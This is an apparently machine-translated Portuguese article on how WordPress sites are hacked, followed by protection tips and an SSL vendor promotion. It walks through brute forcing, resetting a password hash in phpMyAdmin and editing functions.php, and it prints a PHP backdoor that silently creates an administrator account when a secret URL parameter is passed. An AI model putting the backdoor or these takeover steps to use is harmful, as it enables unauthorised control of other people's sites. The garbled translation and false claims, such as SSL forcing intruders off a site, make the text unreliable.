Como Hackear o WordPress?

Introdução

Antes de iniciar este artigo, gostaríamos que você soubesse que o hacking é ilegal, e não motivamos ou encorajamos qualquer atividade malévola. Este artigo é apenas para obter conhecimento sobre como os golpistas trabalham e como os vários métodos de segurança do site são essenciais para mantê-los à distância. Vamos discutir:

• Como os golpistas invadem o WordPress?
• Como proteger seu site WP dos golpistas?

Portanto, sem mais delongas, vamos começar a abordar o tema.

Como Hackear o site WordPress Online?

Como Hackear o Website WordPress Online](hack- into-a-wordpress-website.jpg) (Fonte: wpsecurityninja.com)

Usando WPScan:

WPScan é um scanner de segurança WP que ajuda os proprietários de sites a verificar as vulnerabilidades de seu site WordPress, mas este scanner também é utilizado por hackers para cumprir seus motivos para hackear sites.

O WPScan permite que proprietários e administradores de sites especifiquem contas de usuários WP e senhas de força bruta e são o principal passo para obter acesso não autorizado às contas WP.

(Força bruta de nome de usuário e senha usando WPScan. Fonte: Médio)

MIM Ataca:

Os ataques Man-in-middle (MIM) podem ser facilmente realizados no caso de usuários que utilizam LANs similares. Logins de usuários não criptografados são um alvo fácil, uma vez que todos os detalhes são visíveis em texto simples.

O software envolvido na condução destes tipos de ataques pode detectar temas comprometidos, plugins e pode enumerar usuários.

(Fonte: Média)

Injeções SQL:

Os ataques por injeção SQL são considerados os ataques mais proeminentes usados para penetrar em websites. Estes ataques têm como alvo os backend gateways do site e permitem aos hackers penetrá-los através da implementação de comandos comprometidos.

(Fonte: secure.wphackedhelp.com)

Essas penetrações também permitem aos hackers modificar bancos de dados e comandos e excluir ou roubar informações do site.

Uma vez que estes ataques SQL identificam sites vulneráveis e sem patch, eles facilitam e fazem com que a tarefa de hacking seja bem sucedida.

Utilizando Meu SQL/cPanel:

Neste método, os hackers criam uma conta falsa ou modificam a senha de um usuário atual do site WP. Os hackers tentam penetrar através do cPanel, abrindo o PhpMyAdmin. Eles estão atentos à tabela que termina em _usuários e encontram o usuário que desejam modificar.

Isto lhes permitirá mudar as credenciais do usuário que planejam invadir. Eles rastreiam o usuário e alteram sua senha (do campo user_pass) abrindo o gerador MD5 online, e substituem a mesma por sua desejada, e mais tarde clicando em #.

Utilizando Meu SQL/cPanel](image5.jpg) (Nomes de usuários, senhas de hashed dos usuários, seus IDs de e-mail, etc., são todos armazenados na tabela de banco de dados wp_users. Fonte: firstsiteguide.com)

Os nomes de usuário, senhas de hashed dos usuários, seus IDs de e-mail, etc. são todos armazenados na tabela de banco de dados de usuários do wp_users.

Funções de edição.php:

Os hackers também acessam o cPanel para modificar o arquivo Functions.php. Desbloqueando o Gerenciador de Arquivos, eles caçam a pasta do tema ativo. A partir da pasta public_html/wp_content/themes, eles rastreiam o tema e editam o functions.php, colocando seu código comprometido. O hacking já está em processo porque uma nova conta foi criada pelos hackers. Uma vez feito, eles apagam o código comprometido.

Criar uma nova conta de usuário via FTP:

Geralmente, as contas FTP ajudam os proprietários de sites a gerar um diretório dentro de seu site que permite que usuários específicos façam upload/download de seus arquivos usando suas credenciais de login.

Estes arquivos também são visualizados na Internet.

> Passos para criar uma conta FTP no site:

> - Insira os dados desejados > - Digite o nome de usuário do novo usuário FTP > - Digite a senha para alocação de conta para acesso via FTP > - Digite o nome do diretório para dar acesso via FTP > - Escreva o espaço MB desejado que você deseja atribuir a esta pasta > - Mais tarde pressione o botão "Criar " para criar a nova conta.

Os dados abaixo mencionados devem ser carregados pelo novo usuário para obter acesso via FTP.

Endereço / Nome do Host / Endereço: yourdomain.com ou ftp.yourdomain.com

Usuário / Usuário: [email protected]

Senha: El senha atribuída a esta conta FTP

Port: 21* Nomeie a pasta para upload/download de arquivos.

O novo usuário terá permissões de leitura e escrita tanto no diretório escolhido quanto em todos os subdiretórios que ele contém.

Por exemplo, se você criar o usuário cliente e lhe der acesso ao / home / user / public_html

Penetrando pela porta traseira:

Uma maneira malévola de penetrar no local é através da porta traseira. Seja um golpista que quer ter acesso ao seu site, ou o usuário vítima, que quer voltar a ter acesso ao seu site pela porta dos fundos, ambos precisam seguir os passos abaixo.

Nos casos em que uma nova conta de usuário é criada via FTP ou um reset de senha é feito, mas não dá os resultados desejados, o usuário pode querer hackear seu site via entrada de backdoor e recuperar seu acesso administrativo.

Passos para criar a porta traseira:

• Abra o arquivo functions.php e cole o código abaixo mencionado.

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

• Mais tarde, salvar as mudanças.

Cripto Jacking & Cryptocurrency Mining:

A popularidade das moedas criptográficas deu origem a novas ameaças cibernéticas como crypto-jacking, que também é chamado de criptocurrency mining malware.

O ato de confiscar um computador contra a vontade do usuário, bem como a consciência, é chamado de cripto-jacking. No cripto-jacking de malware, os golpistas infectam o computador do usuário com malware malicioso entregue via software para comprometer sistemas e redes.

Phishing:

Phishing é um método no qual os fraudadores enganam os usuários de suas informações sensíveis (credenciais de login, número de conta social, PIN, detalhes de cartão de crédito, etc.), fazendo-se passar por pessoas jurídicas. Eles geralmente recorrem a e-mails para cumprir seu propósito.

> Exemplo: Um golpista pode se fazer passar por uma fonte confiável e reunir dados pessoais dos usuários para satisfazer seus desejos. > Eles também podem colocar um link ruim no e-mail de phishing e direcioná-los para algum site fraudulento para entregar malware.

Malware:

Estatísticas de Segurança WordPress indicam que 4000 websites WP estão infectados por malware devido a falsos plugins SEO.

Os golpistas não precisam de uma fonte para entregar malware. Plugins SEO, temas WP, e muitos outros fatores presentes no site motivaram os hackers a usar o recente malware WP-VCD.

Até mesmo e-mails de phishing são gateways para a entrega de malware.

Aqui também, o lema dos hackers é o mesmo, ou seja, obter dados sensíveis dos usuários através da penetração de sistemas e do roubo de informações.

WordPress Ransomware:

No WP ransomware, os hackers usam malware para bloquear o acesso dos usuários a sistemas e redes. O mesmo pode ser recuperado pelo usuário pagando um resgate, conforme exigido pelo hacker. > Exemplo: O ataque Petya, no qual o hacker criptografa seus arquivos e dados e exige um resgate contra a chave de descriptografia.

Ataque de XSS (Cross-Site Scripting):

Os ataques XSS são realizados por hackers através da injeção de conteúdo malicioso no site, explorando assim o navegador. Este ataque permite que o hacker roube dados de cookies, modifique o conteúdo do site e aproveite o site para obter dados sensíveis.

Clickjacking:

No clickjacking, o hacker faz uma tentativa maliciosa de comprometer um botão/link e motiva o usuário a clicar sobre o objeto comprometido. Isto permite que o hacker execute comandos maliciosos para obter acesso a dados sensíveis ao usuário.

Spoofing:

A falsificação é um ataque em que a pessoa se disfarça como uma identidade confiável para obter benefícios ilegais para o usuário e enganá-lo a submeter suas informações confidenciais.

Para evitar todos esses ataques de hacking, medidas de segurança específicas precisam ser tomadas para proteger seu site WP.

Como proteger o site WordPress do Hacking?

Como proteger o site WordPress do Hacking?](spoofing.jpg) (Fonte: envisagedigital.co.uk)

As estatísticas acima são suficientes para indicar a popularidade do WordPress. É esta popularidade que torna esta plataforma CMS mais desejável entre os hackers, que tentam métodos variados de hacking para obter acesso aos sites WP e seus dados.

Portanto, é essencial saber como impedir que os hackers acessem seu site WP.

Proteja seu site WP com certificado SSL:

Quando qualquer dado é carregado no site, ele está sempre em texto simples que é facilmente visível para todos, inclusive os hackers. Isto pode ser arriscado, uma vez que os hackers podem usar indevidamente os dados de seu site.

Os certificados SSL (Secure Socket Layers) são aqueles certificados digitais que ajudam a proteger seu site WP com segurança de criptografia de 256 bits, convertendo assim os dados de seu site em um formato codificado.

Os hackers não conseguem ler códigos apesar de terem obtido acesso ao seu site e, portanto, são forçados a sair de tais sites.

Proteja seu site WP com certificado SSL](ssl.jpg) (Fonte: clickssl.net)

Selecione sua marca desejada de certificado SSL (Comodo, Thawte, RapidSSL, etc.) e instale o mesmo em seu site WP. No caso do tipo de certificado SSL, você precisa entender os domínios e subdomínios. Por exemplo, se seu site WP tem subdomínios então, um único Certificado Wildcard barato custando apenas $45/ano aproximadamente pode assegurar todo o seu negócio digital.

Emissão rápida, criptografia de chave de 2048 bits, um impulso em SEO, selo de confiança do site, 99% de compatibilidade navegador/móvel, política de reembolso e garantia são algumas das características e benefícios da instalação de certificados Wildcard SSL.

Várias marcas e opções de produtos SSL, tarifas econômicas e excelente atendimento ao cliente são alguns dos benefícios de se aproximar da loja ClickSSL para proteger seu site WP.

Atualize seus funcionários:

Os erros humanos podem ser desastrosos, portanto sempre se assegure de manter seus funcionários atualizados sobre as últimas ameaças cibernéticas para evitar que eles fiquem vulneráveis.

Se seus funcionários puderem rastrear os sinais suspeitos de um site pirateado na fase inicial, eles podem informar o interessado e impedir que seu site e sua empresa sofram mais danos.

Usar Autenticação de Dois Fatores (2FA):

A implementação do 2FA durante o login no site é a maneira mais importante de evitar ataques por força bruta. Além de acrescentar outra camada de segurança, eles também previnem os dados do site e do usuário.

Isto porque, se uma camada de segurança for comprometida, o golpista precisa invadir a segunda camada para ter acesso ao site.

Esta é uma decisão difícil e, portanto, na maioria dos casos, os golpistas acabam se mudando para outros locais pouco seguros.

> Tip: WP 2FA é um plugin WP gratuito que dá uma camada adicional de segurança ao seu site WP.

Usuários de Administração de Auditoria Regularmente:

Isto é importante para a segurança de seu site WP. Assegure-se de auditar regularmente seus usuários administrativos e verificar seus acessos.

Assegure também que seus usuários, assim como seus funcionários, tenham acesso limitado de acordo com suas tarefas, para evitar falhas de segurança.

Atualizar regularmente o WordPress Core:

Não tem conhecimento sobre o WP Core?

Deixe-me informar que o WP Core inclui todos os arquivos fundamentais necessários para que o WP funcione.

A listagem de arquivos no arquivo zip do WP baixado do WordPress.org

(Fonte: ithemes.com)

Estes arquivos centrais precisam ser atualizados regularmente após o lançamento das atualizações de segurança, para correção de todas as vulnerabilidades de segurança.

Download WP Themes & Plugins a partir de Fontes Confiáveis:

Isto é fundamental porque os plugins podem ser ameaçadores quando não são atualizados ou instalados a partir de fontes não confiáveis. No caso de usar plugins gratuitos/pagos, verifique sempre os fatores abaixo descritos, como por exemplo:

• Avaliações e opiniões dos usuários
• Facilidade de uso
• Compatibilidade
• Segurança
• Fidedignidade

Download WP Themes & Plugins from Trustworthy Sources](image11.png) (Fonte: torquemag.io)

A mesma regra se aplica à instalação de temas WP também.

Atualização regular dos Temas e Plugins WP:

Temas e plugins de WP desatualizados ou vencidos sempre representam uma ameaça ao seu site WP, uma vez que perdem seus padrões de segurança. Para impedir que hackers utilizem tais gateways para espalhar malware para obter acesso ao site, certifique-se de atualizar os temas e plugins utilizados em seu site WP regularmente.

Isto ajudará o plugin a funcionar corretamente e permanecer em sincronia com as últimas versões do WP.

> Tip: Na página de plugins, você pode visualizar todos os plugins instalados e um link indicando "Habilitar atualizações automáticas" ao lado de cada plugin. Ative-o para atualizações automáticas.

Modificar o nome do administrador padrão:

Os hackers são muito inteligentes e podem penetrar facilmente em seu site WP usando o nome padrão do administrador. É sempre preferível modificar o nome de usuário padrão do administrador para evitar que os hackers executem ataques de força bruta para obter acesso não autorizado ao seu site.

Grant Limited Access:

Nunca dê mais do que o necessário e a mesma regra se aplica à concessão de acesso ao site tanto a usuários como a funcionários.

O controle de acesso é a principal regra do site e da segurança dos dados, uma vez que define quem pode ou não acessar o site. Bloquear todas as entradas para o administrador do WP e outros códigos e dados críticos para a segurança do site.

O acesso limitado não só melhora a produtividade, mas também protege seu site de entradas maliciosas.

Atualizar WordPress:

Quando seu WordPress não é atualizado, seu site corre o risco de ser invadido por hackers.

O WordPress rege 37% da participação de mercado, e continua a liberar atualizações regularmente para corrigir falhas e bugs de segurança. Estas atualizações também incluem novas características e melhorias das já existentes que são úteis para melhorar o desempenho de seu site.

(Fonte: wpbeginner.com)

Mantenha seu site WP atualizado para uma segurança robusta.

Embrulhando:

Use senhas fortes e complexas e mantenha seu site WP bem como plugins e temas atualizados para corrigir todos os lapsos de segurança. Leve tempo para educar seus funcionários, pois isso sempre ajudará na prevenção de desastres.

Nunca perca a segurança e assegure-se sempre de usar os melhores e mais confiáveis plugins de segurança para manter seu site WP a salvo de olhares curiosos. Além disso, proteja seu site com SSL para aumentar a confiança dos clientes, negócios e SEO.

Agora que você está ciente de como os hackers funcionam, esperamos que este artigo o ajude a evitar que os hackers penetrem em seu site e a gerenciar seu site WP de forma segura.